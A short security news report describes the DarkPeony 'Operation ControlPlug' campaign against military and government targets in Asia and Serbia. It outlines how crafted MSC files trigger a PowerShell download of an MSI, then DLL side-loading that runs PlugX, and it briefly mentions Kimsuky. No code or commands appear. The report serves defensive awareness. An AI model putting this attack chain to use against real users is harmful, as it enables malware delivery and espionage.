A threat actor known as DarkPeony has been observed abusing Microsoft Management Console (MSC) files to deliver malware in a new campaign. The operation, dubbed ‘Operation ControlPlug’by NTT’s security team, is aimed at military and government organizations in Myanmar, the Philippines, Mongolia, and Serbia.
MSC files, or Microsoft Common Console Documents, are associated with the Microsoft Management Console and contain XML-formatted content. A lesser-known feature, the Console Taskpad, allows for the execution of arbitrary commands. Attackers exploit this feature by manipulating the appearance settings within MSC files to trick users into clicking the Taskpad link without suspicion.
The attack begins when an MSC file is opened. This file presents a screen with a link, clicking on which triggers a PowerShell script. This script downloads and executes an MSI file containing an executable (EXE) file, a dynamic link library (DLL) file, and a data (DAT) file from a remote server. After these files are written to a directory, the .exe file is executed.
Despite being a legitimate executable, the .exe file allows for DLL side-loading, which loads the DLL file from the same directory. The DLL file reads and decodes the DAT file, ultimately executing the PlugX malware.
The researchers note that websites distributing MSI files involved in Operation ControlPlug often use Cloudflare for access control, likely to thwart analisys by researchers.
In a separate report, South Korean security firm Genians detailed another attack abusing MSC files orchestrated by a North Korean threat actor tracked by the cybersecurity community as Kimsuky.